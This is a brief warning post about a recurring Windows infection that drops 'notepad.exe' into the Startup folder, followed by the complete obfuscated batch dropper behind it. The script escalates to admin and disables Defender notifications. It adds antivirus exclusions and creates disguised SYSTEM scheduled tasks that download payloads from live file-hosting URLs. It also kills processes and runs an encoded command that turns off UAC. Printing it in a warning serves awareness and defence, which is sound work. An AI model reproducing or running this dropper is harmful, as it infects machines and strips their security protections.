But be careful with this virus. The name of this virus in the McAfee program is “ti!FC93760371B9”. It is such a virus that; even if the program deletes it, it copies itself to this location again. “C:|Users| Username|AppData| Roaming|Microsoft|Windows| Start Menu| Programs | Startup”
The “notepad.exe” virus that forms in this location uses the following commands hidden in the registry with the actual Windows scheduled tasks as an interface to run hidden commands sent from the internet. If there is such a file in this location, urgent measures should be taken.
@echo OFF
mode con cols=15 lines=1
p""oW""ErsH""el""l.exe -NoP -NonI -W Hidden -Exec Bypass IEX
@echo off
cls
dir
call :Admin
:Admin
reg query "HKU\S-1-5-19\Environment" >nul 2>&1
if not %errorlevel% EQU 0 (
cls
p""oW""ErsH""ell.exe -windowstyle hidden -Noprofile "Start-Process '%~dpnx0' -Verb RunAs"
exit
)
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_dword /d 1 /f
p""oW""Er""sH""ell.exe -command Add-MpPreference -ExclusionPath c"":
s""cht""as""k""s /create /tn OneDriveApiUpReDown /tr "Powershell -Command Invoke-WebRequest https://textbin.net/raw/ozntsv0f5a -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\OneDriveApiUpReDown.cmd" /ru System /sc weekly /d MON,FRI /f
s""cht""as""k""s /create /tn OneDriveApiUpDown /tr "Powershell -Command Invoke-WebRequest https://files.catbox.moe/ich44z.dat -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe" /ru System /SC ONLOGON /DELAY 0000:59 /f
s""cht""as""k""s /create /tn OneDriveApiUpAd /tr "Powershell -command Add-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup" /ru System /SC ONLOGON /DELAY 0000:45 /f
timeout 3
p""oW""ErsH""ell.exe -Command Add-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup
p""oW""Er""sH""ell.exe -Command Invoke-WebRequest https://files.catbox.moe/ich44z.dat -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe
ta""sKKi""ll /IM "AddInUtil.exe" /F
ta""sKKi""ll /IM "aspnet_compiler.exe" /F
ta""sKKi""ll /IM "MSBuild.exe" /F
ta""sKKi""ll /IM "RegAsm.exe" /F
ta""sKKi""ll /IM "AddInProcess.exe" /F
ta""sKKi""ll /IM "RegSvcs.exe" /F
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath c:
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath c:\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Local\Temp
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Local\Temp\
p""oW""ErsH""ell.exe -exEc bypass -enc cgBlAGcALgBlAHgAZQAgAEEARABEACAASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACAALwB2ACAARQBuAGEAYgBsAGUATABVAEEAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYADQAKAA==
cls
c:
cd\
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
start notepad.exe
timeout 3
del *.cmd /f /q
cls
exit
exit